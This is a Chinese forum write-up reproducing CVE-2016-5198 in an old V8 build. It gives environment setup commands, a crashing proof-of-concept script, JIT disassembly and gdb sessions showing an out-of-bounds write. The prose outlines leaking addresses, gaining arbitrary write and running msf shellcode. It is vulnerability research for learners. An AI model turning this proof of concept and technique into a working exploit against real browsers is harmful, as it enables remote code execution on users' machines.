首页
社区
课程
招聘
Chrome V8 CVE-2016-5198 复现
发表于: 2024-8-25 22:06 5394

Chrome V8 CVE-2016-5198 复现

2024-8-25 22:06
5394

(这里解释下为什么要安装 python2.7 ,这个漏洞存在于 v8 老版本,这个commit下版本编译/同步等诸多脚本使用的还是 python2 的语法,用python3 会有一大堆报错)

我这里就选择python2.7版本为默认版本

这里我选择的是设置命令行的 HTTP 全局代理 和 git 代理

设置之后 depot_tools 下载包用的代理

至此,V8已经被被我们编译出来了

至此,环境搭建完毕。

拉取并编译

Output :

使用 --print-code 可以全量观察 JIT 优化前后机器码的区别,其中我们需要注意的是 Check 函数的优化

修改 poc.js ,在其中加入 native syntax ,便于我们调试 ,然后进入 gdb

触发 native syntax 语法 %SystemBreak(); 断下来后,关注打印的信息

使用 job 命令 可以看到 带有解释的汇编以及机器吗实际的地址

此时我们就能对我们感兴趣的部分下断点了, 直接断点到取地址赋值的开始

可以看到 这个时候 FixedArray 的长度是 0,如果此时向其中写入内容则会发生数组越界
越界前 FixedArray:

越界前 先看下各项是什么:

所以在越界前, FixArray的内存布局为

来到越界写的这一条指令:

单步执行后验证

在构造利用前 我们先观察一个规律,

如上的Check函数 当循环多次后,JIT 引擎对函数产生了优化, 对 n 的赋值部分汇编如下

可以看到 ,其中 只有 n.xyz 把 [[rax+0x7] + offset] 位置的数据当作指针处理,而其他的变量都是直接写到 [[rax+0x7] + offset] 位置上。

如果我们换一个js写法:

此时优化后的汇编如下:

由此可以总结出一条规律,只要是写入浮点数,(通过参考文章也可以知道,其实是非 smi 的赋值),我们写入的目标就是 [[rax+0x7] + offset] 指针指向的内存
如果是写入的是 smi ,则会直接写在 [[rax+0x7] + offset]

构造 payload 如下:

调试观察内存情况

如此,我们便把 Check JSFunciton 结构的地址填到了 null string 的 value 字段,然后我们通过 str.charCodeAt(x) 即可取出每个字节的数据

如上,组合后即可 leak 出填入 string value 字段的目标地址。

通过上一节的规律我们可以发现,如果写入一个非smi,则会写入[[rax+0x7] + offset]指向的地址,那如果 [[rax+0x7] + offset] 指向的位置即是 [rax+0x7] 是不是即可以完成任意地址写?

即,我们想要构造的内存如下:

这个内存结构就是 null(string).value -> &null(string),然后我们再创造另一个优化后目标是写入指针的函数,即可在任意地址写入任意浮点数(任意写达成)
如下:

任意写之后,内存结构如下,如我们预期

这里直接解释下exp的思路:
当我们有了任意写的能力后,可以通过自定义一个函数,然后修改函数的机器码地址指针,让其指向我们申请的另一块数组内存
而我们将真正的 shellcode 写到这个内存中。
代码详见 后续完整exp部分

shellcode 可以由 msf 生成

然后将其按照我们能够利用的方式排列

利用效果

对于漏洞利用的研究,我认为由远及近的系统性研究更能对其演变产生理解,熟悉系统,强化漏洞利用的技法,最终形成自己的一套方法论,但是由于这个漏洞年代有些远了,很多当时复现文章中装环境的部分已经失去了有效性,容易踩坑,在折腾了许久环境后终于找到一条可用路径,故分享出来给各个想要入门的同学。

sudo apt update
sudo apt upgrade
sudo apt update
sudo apt upgrade
sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
sudo apt install open-vm-tools
sudo apt install open-vm-tools-desktop
sudo apt install bison cdbs curl flex g++ git vim pkg-config make lbzip2 clang openssl libssl-dev libncurses5
sudo apt install bison cdbs curl flex g++ git vim pkg-config make lbzip2 clang openssl libssl-dev libncurses5
sudo apt-get install build-essential checkinstall libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
wget https://www.python.org/ftp/python/2.7.18/Python-2.7.18.tgz
tar xzf Python-2.7.18.tgz
cd Python-2.7.18
./configure --enable-optimizations
sudo make altinstall
sudo apt-get install build-essential checkinstall libncursesw5-dev libssl-dev libsqlite3-dev tk-dev libgdbm-dev libc6-dev libbz2-dev
wget https://www.python.org/ftp/python/2.7.18/Python-2.7.18.tgz
tar xzf Python-2.7.18.tgz
cd Python-2.7.18
./configure --enable-optimizations
sudo make altinstall
sudo ln -sfn '/usr/local/bin/python2.7' '/usr/bin/python2'
sudo update-alternatives --install /usr/bin/python python /usr/bin/python2 1
sudo update-alternatives --install /usr/bin/python python /usr/bin/python3  2
sudo ln -sfn '/usr/local/bin/python2.7' '/usr/bin/python2'
sudo update-alternatives --install /usr/bin/python python /usr/bin/python2 1
sudo update-alternatives --install /usr/bin/python python /usr/bin/python3  2
sudo update-alternatives --config python  (选择切换Python版本)
python --version (查看Python版本)
sudo update-alternatives --config python  (选择切换Python版本)
python --version (查看Python版本)
wget http://archive.ubuntu.com/ubuntu/pool/universe/n/ncurses/libtinfo5_6.4-2_amd64.deb
sudo dpkg -i libtinfo5_6.4-2_amd64.deb
wget http://archive.ubuntu.com/ubuntu/pool/universe/n/ncurses/libtinfo5_6.4-2_amd64.deb
sudo dpkg -i libtinfo5_6.4-2_amd64.deb
git config --global http.proxy 172.16.185.1:1087
echo 'export http_proxy="172.16.185.1:1087"' >> ~/.bashrc
echo 'export https_proxy=$http_proxy' >> ~/.bashrc
git config --global http.proxy 172.16.185.1:1087
echo 'export http_proxy="172.16.185.1:1087"' >> ~/.bashrc
echo 'export https_proxy=$http_proxy' >> ~/.bashrc
echo '[Boto]' >> ~/.boto.cfg
echo 'proxy=http://172.16.185.1' >> ~/.boto.cfg
echo 'proxy_port=1087' >> ~/.boto.cfg
echo 'export NO_AUTH_BOTO_CONFIG=/home/jojo/.boto.cfg' >> ~/.bashrc
echo '[Boto]' >> ~/.boto.cfg
echo 'proxy=http://172.16.185.1' >> ~/.boto.cfg
echo 'proxy_port=1087' >> ~/.boto.cfg
echo 'export NO_AUTH_BOTO_CONFIG=/home/jojo/.boto.cfg' >> ~/.bashrc
git clone https://github.com/ninja-build/ninja.git
cd ninja
./configure.py --bootstrap
echo 'export PATH=$PATH:"/home/jojo/Desktop/ninja"' >> ~/.bashrc
git clone https://github.com/ninja-build/ninja.git
cd ninja
./configure.py --bootstrap
echo 'export PATH=$PATH:"/home/jojo/Desktop/ninja"' >> ~/.bashrc
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
echo 'export PATH=$PATH:"/home/jojo/Desktop/depot_tools"' >> ~/.bashrc
git clone https://chromium.googlesource.com/chromium/tools/depot_tools.git
echo 'export PATH=$PATH:"/home/jojo/Desktop/depot_tools"' >> ~/.bashrc
source ~/.bashrc
source ~/.bashrc
fetch v8
# 这步会卡蛮久的,只要没报错就都是正常,等就完事
cd v8
# 拉取指定 漏洞版本 ,此版本为 CVE-2016-5198 所需版本
git checkout a7a350012c05f644f3f373fb48d7ac72f7f60542
gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug
fetch v8
# 这步会卡蛮久的,只要没报错就都是正常,等就完事
cd v8
# 拉取指定 漏洞版本 ,此版本为 CVE-2016-5198 所需版本
git checkout a7a350012c05f644f3f373fb48d7ac72f7f60542
gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug
sudo update-alternatives --config python
sudo update-alternatives --config python
sudo apt-get update
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip --break-system-packages
python3 -m pip install --upgrade pwntools --break-system-packages
sudo apt-get update
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
python3 -m pip install --upgrade pip --break-system-packages
python3 -m pip install --upgrade pwntools --break-system-packages
git config --global --unset http.proxy
git config --global --unset http.proxy
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
git clone https://github.com/pwndbg/pwndbg
cd pwndbg
./setup.sh
source /home/jojo/pwndbg/gdbinit.py
source /home/jojo/Desktop/v8/tools/gdbinit
source /home/jojo/Desktop/v8/tools/gdb-v8-support.py
source /home/jojo/pwndbg/gdbinit.py
source /home/jojo/Desktop/v8/tools/gdbinit
source /home/jojo/Desktop/v8/tools/gdb-v8-support.py
//DebugPrint 方法会打印目标对象的内存地址并对其主要信息进行输出
%DebugPrint(a);
 
//该方法可以在脚本中下断点
%SystemBreak();
//DebugPrint 方法会打印目标对象的内存地址并对其主要信息进行输出
%DebugPrint(a);
 
//该方法可以在脚本中下断点
%SystemBreak();
pwndbg> r --allow-natives-syntax poc.js
pwndbg> r --allow-natives-syntax poc.js
pwndbg> job 0x1ee6f58ab791
0x1ee6f58ab791: [Function]
 - map = 0x2ce9b88840f1 [FastProperties]
 - prototype = 0x1ee6f58840b9
 - elements = 0xc9b5f282241 <FixedArray[0]> [FAST_HOLEY_ELEMENTS]
 - initial_map =
pwndbg> job 0x1ee6f58ab791
0x1ee6f58ab791: [Function]
 - map = 0x2ce9b88840f1 [FastProperties]
 - prototype = 0x1ee6f58840b9
 - elements = 0xc9b5f282241 <FixedArray[0]> [FAST_HOLEY_ELEMENTS]
 - initial_map =
./v8/out.gn/x64.debug/d8 --allow-natives-syntax --print-code poc.js
./v8/out.gn/x64.debug/d8 --allow-natives-syntax --print-code poc.js
# need use python2
git checkout a7a350012c05f644f3f373fb48d7ac72f7f60542
gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug d8
# need use python2
git checkout a7a350012c05f644f3f373fb48d7ac72f7f60542
gclient sync
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug d8
function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;
  parseInt();
}
for(var i=0; i<2000; ++i) {
  Ctor();
}
for(var i=0; i<2000; ++i) {
  Check();
}
 
Ctor();
Check();
function Ctor() {
  n = new Set();
}
function Check() {
  n.xyz = 0x826852f4;
  parseInt();
}
for(var i=0; i<2000; ++i) {
  Ctor();
}
for(var i=0; i<2000; ++i) {
  Check();
}
 
Ctor();
Check();
jojo@pwn:/mnt/hgfs/v8/CVE-2016-5198$ ~/Desktop/v8/out.gn/x64.debug/d8 poc.js
Received signal 11 <unknown> 000000000000
 
==== C stack trace ===============================
 
 [0x796675dd8a4e]
 [0x796675dd89a5]
 [0x796673c45320]
 [0x796674a2a0d5]
 [0x7966752e3ecb]
 [0x7966754c4bfa]
 [0x7966754c4639]
 [0x365abda043a7]
[end of stack trace]
Segmentation fault (core dumped)
jojo@pwn:/mnt/hgfs/v8/CVE-2016-5198$ ~/Desktop/v8/out.gn/x64.debug/d8 poc.js
Received signal 11 <unknown> 000000000000
 
==== C stack trace ===============================
 
 [0x796675dd8a4e]
 [0x796675dd89a5]
 [0x796673c45320]
 [0x796674a2a0d5]
 [0x7966752e3ecb]
 [0x7966754c4bfa]
 [0x7966754c4639]
 [0x365abda043a7]
[end of stack trace]
Segmentation fault (core dumped)
jojo@pwn:/mnt/hgfs/v8/CVE-2016-5198$ ~/Desktop/v8/out.gn/x64.debug/d8 poc.js --print-code
...
 
//----------------------------优化前-------------------------------
--- Raw source ---
() {
    n.xyz = 0x826852f4;
    parseInt();
  }
--- Code ---
source_position = 57
kind = FUNCTION
name = Check
compiler = full-codegen
Instructions (size = 212)
0x247968a869c0     0  55             push rbp
0x247968a869c1     1  4889e5         REX.W movq rbp,rsp
0x247968a869c4     4  56             push rsi
0x247968a869c5     5  57             push rdi
0x247968a869c6     6  488b4f2f       REX.W movq rcx,[rdi+0x2f]
0x247968a869ca    10  488b490f       REX.W movq rcx,[rcx+0xf]
0x247968a869ce    14  83411b01       addl [rcx+0x1b],0x1
0x247968a869d2    18  493ba5600c0000 REX.W cmpq rsp,[r13+0xc60]
0x247968a869d9    25  7305           jnc 32  (0x247968a869e0)
0x247968a869db    27  e800bff5ff     call StackCheck  (0x2479689e28e0)    ;; code: BUILTIN
0x247968a869e0    32  48b80000000002000000 REX.W movq rax,0x200000000
0x247968a869ea    42  e8f1d9ffff     call 0x247968a843e0     ;; code: LOAD_GLOBAL_IC
0x247968a869ef    47  50             push rax
0x247968a869f0    48  48b881c3c2ba80280000 REX.W movq rax,0x2880bac2c381    ;; object: 0x2880bac2c381 <Number: 2.18788e+09>
0x247968a869fa    58  5a             pop rdx
0x247968a869fb    59  48b919b0c2ba80280000 REX.W movq rcx,0x2880bac2b019    ;; object: 0x2880bac2b019 <String[3]: xyz>
0x247968a86a05    69  48bf0000000004000000 REX.W movq rdi,0x400000000
//---------------------------------------------- 优化前的变量赋值:优化前使用CALL LOAD_GLOBAL_IC / STORE_IC 去存储 XYZ 数据
0x247968a86a0f    79  e84cb8f0ff     call 0x247968992260     ;; code: STORE_IC
//----------------------------------------------
0x247968a86a14    84  488b75f8       REX.W movq rsi,[rbp-0x8]
0x247968a86a18    88  48b80000000008000000 REX.W movq rax,0x800000000
0x247968a86a22    98  e8b9d9ffff     call 0x247968a843e0     ;; code: LOAD_GLOBAL_IC
0x247968a86a27   103  50             push rax
0x247968a86a28   104  49ba1123c8293c130000 REX.W movq r10,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86a32   114  4152           push r10
0x247968a86a34   116  48ba0000000006000000 REX.W movq rdx,0x600000000
0x247968a86a3e   126  488b7c2408     REX.W movq rdi,[rsp+0x8]
0x247968a86a43   131  33c0           xorl rax,rax
0x247968a86a45   133  e8f6ddffff     call 0x247968a84840     ;; code: CALL_IC
0x247968a86a4a   138  488b75f8       REX.W movq rsi,[rbp-0x8]
0x247968a86a4e   142  4883c408       REX.W addq rsp,0x8
0x247968a86a52   146  498b45a0       REX.W movq rax,[r13-0x60]
0x247968a86a56   150  48bb61c4c2ba80280000 REX.W movq rbx,0x2880bac2c461    ;; object: 0x2880bac2c461 Cell for 6144
0x247968a86a60   160  83430bd1       addl [rbx+0xb],0xd1
0x247968a86a64   164  791f           jns 197  (0x247968a86a85)
0x247968a86a66   166  50             push rax
0x247968a86a67   167  e8f4bdf5ff     call InterruptCheck  (0x2479689e2860)    ;; code: BUILTIN
0x247968a86a6c   172  58             pop rax
0x247968a86a6d   173  48bb61c4c2ba80280000 REX.W movq rbx,0x2880bac2c461    ;; object: 0x2880bac2c461 Cell for 6144
0x247968a86a77   183  49ba0000000000180000 REX.W movq r10,0x180000000000
0x247968a86a81   193  4c895307       REX.W movq [rbx+0x7],r10
0x247968a86a85   197  c9             leavel
0x247968a86a86   198  c20800         ret 0x8
0x247968a86a89   201  0f1f8000000000 nop
 
//----------------------------优化后-------------------------------
--- Code ---
0x247968a86c40     0  55             push rbp
0x247968a86c41     1  4889e5         REX.W movq rbp,rsp
0x247968a86c44     4  56             push rsi
0x247968a86c45     5  57             push rdi
0x247968a86c46     6  4883ec08       REX.W subq rsp,0x8
0x247968a86c4a    10  488b45f8       REX.W movq rax,[rbp-0x8]
0x247968a86c4e    14  488945e8       REX.W movq [rbp-0x18],rax
0x247968a86c52    18  488bf0         REX.W movq rsi,rax
0x247968a86c55    21  493ba5600c0000 REX.W cmpq rsp,[r13+0xc60]
0x247968a86c5c    28  7305           jnc 35  (0x247968a86c63)
0x247968a86c5e    30  e87dbcf5ff     call StackCheck  (0x2479689e28e0)    ;; code: BUILTIN
0x247968a86c63    35  48b859bdc2ba80280000 REX.W movq rax,0x2880bac2bd59    ;; object: 0x2880bac2bd59 PropertyCell for 0x2d4f15ad45e9 <a Set with map 0xf3399b8c391>
0x247968a86c6d    45  488b400f       REX.W movq rax,[rax+0xf]
//---------------------------------------------------------------- 优化后减少了CALL LOAD_GLOBAL_IC / STORE_IC 的调用,取而代之的是直接的内存访问
// 原因是因为 Set 的 Fixed_Array 尚未分配空间,此时写的话就会产生数组越界问题
0x247968a86c71    49  49ba0000805e0a4de041 REX.W movq r10,0x41e04d0a5e800000
0x247968a86c7b    59  c4c1f96ec2     vmovq xmm0,r10
0x247968a86c80    64  488b4007       REX.W movq rax,[rax+0x7]
0x247968a86c84    68  488b400f       REX.W movq rax,[rax+0xf]
0x247968a86c88    72  c5fb114007     vmovsd [rax+0x7],xmm0
//----------------------------------------------------------------
0x247968a86c8d    77  49ba1123c8293c130000 REX.W movq r10,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86c97    87  4152           push r10
0x247968a86c99    89  48bf51d8c0ba80280000 REX.W movq rdi,0x2880bac0d851    ;; object: 0x2880bac0d851 <JS Function parseInt (SharedFunctionInfo 0x133c29cbce11)>
0x247968a86ca3    99  488b75e8       REX.W movq rsi,[rbp-0x18]
0x247968a86ca7   103  488b7727       REX.W movq rsi,[rdi+0x27]
0x247968a86cab   107  498b55a0       REX.W movq rdx,[r13-0x60]
0x247968a86caf   111  33c0           xorl rax,rax
0x247968a86cb1   113  bb02000000     movl rbx,0x2
0x247968a86cb6   118  e845efefff     call ArgumentsAdaptorTrampoline  (0x247968985c00)    ;; code: BUILTIN
0x247968a86cbb   123  48b81123c8293c130000 REX.W movq rax,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86cc5   133  488be5         REX.W movq rsp,rbp
0x247968a86cc8   136  5d             pop rbp
0x247968a86cc9   137  c20800         ret 0x8
jojo@pwn:/mnt/hgfs/v8/CVE-2016-5198$ ~/Desktop/v8/out.gn/x64.debug/d8 poc.js --print-code
...
 
//----------------------------优化前-------------------------------
--- Raw source ---
() {
    n.xyz = 0x826852f4;
    parseInt();
  }
--- Code ---
source_position = 57
kind = FUNCTION
name = Check
compiler = full-codegen
Instructions (size = 212)
0x247968a869c0     0  55             push rbp
0x247968a869c1     1  4889e5         REX.W movq rbp,rsp
0x247968a869c4     4  56             push rsi
0x247968a869c5     5  57             push rdi
0x247968a869c6     6  488b4f2f       REX.W movq rcx,[rdi+0x2f]
0x247968a869ca    10  488b490f       REX.W movq rcx,[rcx+0xf]
0x247968a869ce    14  83411b01       addl [rcx+0x1b],0x1
0x247968a869d2    18  493ba5600c0000 REX.W cmpq rsp,[r13+0xc60]
0x247968a869d9    25  7305           jnc 32  (0x247968a869e0)
0x247968a869db    27  e800bff5ff     call StackCheck  (0x2479689e28e0)    ;; code: BUILTIN
0x247968a869e0    32  48b80000000002000000 REX.W movq rax,0x200000000
0x247968a869ea    42  e8f1d9ffff     call 0x247968a843e0     ;; code: LOAD_GLOBAL_IC
0x247968a869ef    47  50             push rax
0x247968a869f0    48  48b881c3c2ba80280000 REX.W movq rax,0x2880bac2c381    ;; object: 0x2880bac2c381 <Number: 2.18788e+09>
0x247968a869fa    58  5a             pop rdx
0x247968a869fb    59  48b919b0c2ba80280000 REX.W movq rcx,0x2880bac2b019    ;; object: 0x2880bac2b019 <String[3]: xyz>
0x247968a86a05    69  48bf0000000004000000 REX.W movq rdi,0x400000000
//---------------------------------------------- 优化前的变量赋值:优化前使用CALL LOAD_GLOBAL_IC / STORE_IC 去存储 XYZ 数据
0x247968a86a0f    79  e84cb8f0ff     call 0x247968992260     ;; code: STORE_IC
//----------------------------------------------
0x247968a86a14    84  488b75f8       REX.W movq rsi,[rbp-0x8]
0x247968a86a18    88  48b80000000008000000 REX.W movq rax,0x800000000
0x247968a86a22    98  e8b9d9ffff     call 0x247968a843e0     ;; code: LOAD_GLOBAL_IC
0x247968a86a27   103  50             push rax
0x247968a86a28   104  49ba1123c8293c130000 REX.W movq r10,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86a32   114  4152           push r10
0x247968a86a34   116  48ba0000000006000000 REX.W movq rdx,0x600000000
0x247968a86a3e   126  488b7c2408     REX.W movq rdi,[rsp+0x8]
0x247968a86a43   131  33c0           xorl rax,rax
0x247968a86a45   133  e8f6ddffff     call 0x247968a84840     ;; code: CALL_IC
0x247968a86a4a   138  488b75f8       REX.W movq rsi,[rbp-0x8]
0x247968a86a4e   142  4883c408       REX.W addq rsp,0x8
0x247968a86a52   146  498b45a0       REX.W movq rax,[r13-0x60]
0x247968a86a56   150  48bb61c4c2ba80280000 REX.W movq rbx,0x2880bac2c461    ;; object: 0x2880bac2c461 Cell for 6144
0x247968a86a60   160  83430bd1       addl [rbx+0xb],0xd1
0x247968a86a64   164  791f           jns 197  (0x247968a86a85)
0x247968a86a66   166  50             push rax
0x247968a86a67   167  e8f4bdf5ff     call InterruptCheck  (0x2479689e2860)    ;; code: BUILTIN
0x247968a86a6c   172  58             pop rax
0x247968a86a6d   173  48bb61c4c2ba80280000 REX.W movq rbx,0x2880bac2c461    ;; object: 0x2880bac2c461 Cell for 6144
0x247968a86a77   183  49ba0000000000180000 REX.W movq r10,0x180000000000
0x247968a86a81   193  4c895307       REX.W movq [rbx+0x7],r10
0x247968a86a85   197  c9             leavel
0x247968a86a86   198  c20800         ret 0x8
0x247968a86a89   201  0f1f8000000000 nop
 
//----------------------------优化后-------------------------------
--- Code ---
0x247968a86c40     0  55             push rbp
0x247968a86c41     1  4889e5         REX.W movq rbp,rsp
0x247968a86c44     4  56             push rsi
0x247968a86c45     5  57             push rdi
0x247968a86c46     6  4883ec08       REX.W subq rsp,0x8
0x247968a86c4a    10  488b45f8       REX.W movq rax,[rbp-0x8]
0x247968a86c4e    14  488945e8       REX.W movq [rbp-0x18],rax
0x247968a86c52    18  488bf0         REX.W movq rsi,rax
0x247968a86c55    21  493ba5600c0000 REX.W cmpq rsp,[r13+0xc60]
0x247968a86c5c    28  7305           jnc 35  (0x247968a86c63)
0x247968a86c5e    30  e87dbcf5ff     call StackCheck  (0x2479689e28e0)    ;; code: BUILTIN
0x247968a86c63    35  48b859bdc2ba80280000 REX.W movq rax,0x2880bac2bd59    ;; object: 0x2880bac2bd59 PropertyCell for 0x2d4f15ad45e9 <a Set with map 0xf3399b8c391>
0x247968a86c6d    45  488b400f       REX.W movq rax,[rax+0xf]
//---------------------------------------------------------------- 优化后减少了CALL LOAD_GLOBAL_IC / STORE_IC 的调用,取而代之的是直接的内存访问
// 原因是因为 Set 的 Fixed_Array 尚未分配空间,此时写的话就会产生数组越界问题
0x247968a86c71    49  49ba0000805e0a4de041 REX.W movq r10,0x41e04d0a5e800000
0x247968a86c7b    59  c4c1f96ec2     vmovq xmm0,r10
0x247968a86c80    64  488b4007       REX.W movq rax,[rax+0x7]
0x247968a86c84    68  488b400f       REX.W movq rax,[rax+0xf]
0x247968a86c88    72  c5fb114007     vmovsd [rax+0x7],xmm0
//----------------------------------------------------------------
0x247968a86c8d    77  49ba1123c8293c130000 REX.W movq r10,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86c97    87  4152           push r10
0x247968a86c99    89  48bf51d8c0ba80280000 REX.W movq rdi,0x2880bac0d851    ;; object: 0x2880bac0d851 <JS Function parseInt (SharedFunctionInfo 0x133c29cbce11)>
0x247968a86ca3    99  488b75e8       REX.W movq rsi,[rbp-0x18]
0x247968a86ca7   103  488b7727       REX.W movq rsi,[rdi+0x27]
0x247968a86cab   107  498b55a0       REX.W movq rdx,[r13-0x60]
0x247968a86caf   111  33c0           xorl rax,rax
0x247968a86cb1   113  bb02000000     movl rbx,0x2
0x247968a86cb6   118  e845efefff     call ArgumentsAdaptorTrampoline  (0x247968985c00)    ;; code: BUILTIN
0x247968a86cbb   123  48b81123c8293c130000 REX.W movq rax,0x133c29c82311    ;; object: 0x133c29c82311 <undefined>
0x247968a86cc5   133  488be5         REX.W movq rsp,rbp
0x247968a86cc8   136  5d             pop rbp
0x247968a86cc9   137  c20800         ret 0x8
function Ctor() {
    n = new Set();
  }
  function Check() {
    n.xyz = 0x826852f4;
    parseInt();
  }
  for(var i=0; i<2000; ++i) {
    Ctor();
  }
  for(var i=0; i<2000; ++i) {
    Check();
  }
   
  Ctor();
  %DebugPrint(Check);
  %SystemBreak();
  Check();
function Ctor() {
    n = new Set();
  }
  function Check() {
    n.xyz = 0x826852f4;
    parseInt();
  }
  for(var i=0; i<2000; ++i) {
    Ctor();
  }
  for(var i=0; i<2000; ++i) {
    Check();
  }
   
  Ctor();
  %DebugPrint(Check);
  %SystemBreak();
  Check();
DebugPrint: 0x3bf28ee2b7d1: [Function]
 - map = 0x43323040f1 [FastProperties]
 - prototype = 0x3bf28ee040b9
 - elements = 0xcd748382241 <FixedArray[0]> [FAST_HOLEY_ELEMENTS]
 - initial_map =
 - shared_info = 0x3bf28ee2b379 <SharedFunctionInfo Check>
 - name = 0x3bf28ee2aff9 <String[5]: Check>
 - formal_parameter_count = 0
 - context = 0x3bf28ee03951 <FixedArray[235]>
 - literals = 0x3bf28ee2c591 <FixedArray[1]>
 - code = 0x3c1871406c21 <Code: OPTIMIZED_FUNCTION>  //主要看这个 JSFunction 的结构,使用 job 命令可以在 gdb 中查看
DebugPrint: 0x3bf28ee2b7d1: [Function]
 - map = 0x43323040f1 [FastProperties]
 - prototype = 0x3bf28ee040b9
 - elements = 0xcd748382241 <FixedArray[0]> [FAST_HOLEY_ELEMENTS]
 - initial_map =
 - shared_info = 0x3bf28ee2b379 <SharedFunctionInfo Check>
 - name = 0x3bf28ee2aff9 <String[5]: Check>
 - formal_parameter_count = 0
 - context = 0x3bf28ee03951 <FixedArray[235]>
 - literals = 0x3bf28ee2c591 <FixedArray[1]>
 - code = 0x3c1871406c21 <Code: OPTIMIZED_FUNCTION>  //主要看这个 JSFunction 的结构,使用 job 命令可以在 gdb 中查看
pwndbg> job 0x3c1871406c21
0x3c1871406c21: [Code]
kind = OPTIMIZED_FUNCTION
stack_slots = 5
compiler = crankshaft
Instructions (size = 170)
0x3c1871406c80     0  55             push rbp
0x3c1871406c81     1  4889e5         REX.W movq rbp,rsp
...
pwndbg> job 0x3c1871406c21
0x3c1871406c21: [Code]
kind = OPTIMIZED_FUNCTION
stack_slots = 5
compiler = crankshaft
Instructions (size = 170)
0x3c1871406c80     0  55             push rbp
0x3c1871406c81     1  4889e5         REX.W movq rbp,rsp
...
  ► 0x3c1871406ca3    movabs rax, 0x3bf28ee2bdb1              RAX => 0x3bf28ee2bdb1 ◂— 0xb1cecb02a
    0x3c1871406cad    mov    rax, qword ptr [rax + 0xf]       RAX, [0x3bf28ee2bdc0] => 0x13869995c4f1 ◂— 0x4100000043323065 /* 'e02C' */
    0x3c1871406cb1    movabs r10, 0x41e04d0a5e800000          R10 => 0x41e04d0a5e800000
    0x3c1871406cbb    vmovq  xmm0, r10
    0x3c1871406cc0    mov    rax, qword ptr [rax + 7]         RAX, [0x13869995c4f8] => 0xcd748382241 ◂— 0xb1cecb023
    0x3c1871406cc4    mov    rax, qword ptr [rax + 0xf]       RAX, [0xcd748382250] => 0xb1cecb02361 ◂— 0xb1cecb022
 
pwndbg> job 0x3bf28ee2bdb1
0x3bf28ee2bdb1: [PropertyCell]
 - value: 0x13869995c4f1 <a Set with map 0x4332306509>
 - details: (data, dictionary_index: 138, attrs: [WEC])
 - cell_type: ConstantType (StableMap)
  ► 0x3c1871406ca3    movabs rax, 0x3bf28ee2bdb1              RAX => 0x3bf28ee2bdb1 ◂— 0xb1cecb02a
    0x3c1871406cad    mov    rax, qword ptr [rax + 0xf]       RAX, [0x3bf28ee2bdc0] => 0x13869995c4f1 ◂— 0x4100000043323065 /* 'e02C' */
    0x3c1871406cb1    movabs r10, 0x41e04d0a5e800000          R10 => 0x41e04d0a5e800000
    0x3c1871406cbb    vmovq  xmm0, r10
    0x3c1871406cc0    mov    rax, qword ptr [rax + 7]         RAX, [0x13869995c4f8] => 0xcd748382241 ◂— 0xb1cecb023
    0x3c1871406cc4    mov    rax, qword ptr [rax + 0xf]       RAX, [0xcd748382250] => 0xb1cecb02361 ◂— 0xb1cecb022
 
pwndbg> job 0x3bf28ee2bdb1
0x3bf28ee2bdb1: [PropertyCell]
 - value: 0x13869995c4f1 <a Set with map 0x4332306509>
 - details: (data, dictionary_index: 138, attrs: [WEC])
 - cell_type: ConstantType (StableMap)
   0x2c6522e06ca3    movabs rax, 0xbc7b43abdb1              RAX => 0xbc7b43abdb1 ◂— 0x3f7561c02a
   0x2c6522e06cad    mov    rax, qword ptr [rax + 0xf]      RAX, [0xbc7b43abdc0] => 0x290ed79dc4f1 ◂— 0x410000196777e865
   0x2c6522e06cb1    movabs r10, 0x41e04d0a5e800000         R10 => 0x41e04d0a5e800000
   0x2c6522e06cbb    vmovq  xmm0, r10
 ► 0x2c6522e06cc0    mov    rax, qword ptr [rax + 7]        RAX, [0x290ed79dc4f8] => 0x3e4915602241 ◂— 0x3f7561c023
   0x2c6522e06cc4    mov    rax, qword ptr [rax + 0xf]      RAX, [0x3e4915602250] => 0x3f7561c02361 ◂— 0x3f7561c022
   0x2c6522e06cc8    vmovsd qword ptr [rax + 7], xmm0
   0x2c6522e06ccd    movabs r10, 0x3e4915602311             R10 => 0x3e4915602311 ◂— 0x3f7561c024
   0x2c6522e06cd7    push   r10
   0x2c6522e06cd9    movabs rdi, 0xbc7b438d851              RDI => 0xbc7b438d851 ◂— 0x410000196777e82a
   0x2c6522e06ce3    mov    rsi, qword ptr [rbp - 0x18]     RSI, [0x7ffd0ebafdf8] => 0xbc7b4383951 ◂— 0x3f7561c02c
 
pwndbg> job $rax
0x13869995c4f1: [JSSet]
 - map = 0x4332306509 [FastProperties]
 - prototype = 0x3bf28ee15e49
 - elements = 0xcd748382241 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS] - table = 0x13869995c511 <FixedArray[13]>
 - properties = {
 }
pwndbg>  x/4gx $rax-1
0x13869995c4f0: 0x0000004332306509      0x00000cd748382241
0x13869995c500: 0x00000cd748382241      0x000013869995c511
pwndbg> job 0x00000cd748382241
0xcd748382241: [FixedArray]
 - length: 0
   0x2c6522e06ca3    movabs rax, 0xbc7b43abdb1              RAX => 0xbc7b43abdb1 ◂— 0x3f7561c02a
   0x2c6522e06cad    mov    rax, qword ptr [rax + 0xf]      RAX, [0xbc7b43abdc0] => 0x290ed79dc4f1 ◂— 0x410000196777e865
   0x2c6522e06cb1    movabs r10, 0x41e04d0a5e800000         R10 => 0x41e04d0a5e800000
   0x2c6522e06cbb    vmovq  xmm0, r10
 ► 0x2c6522e06cc0    mov    rax, qword ptr [rax + 7]        RAX, [0x290ed79dc4f8] => 0x3e4915602241 ◂— 0x3f7561c023
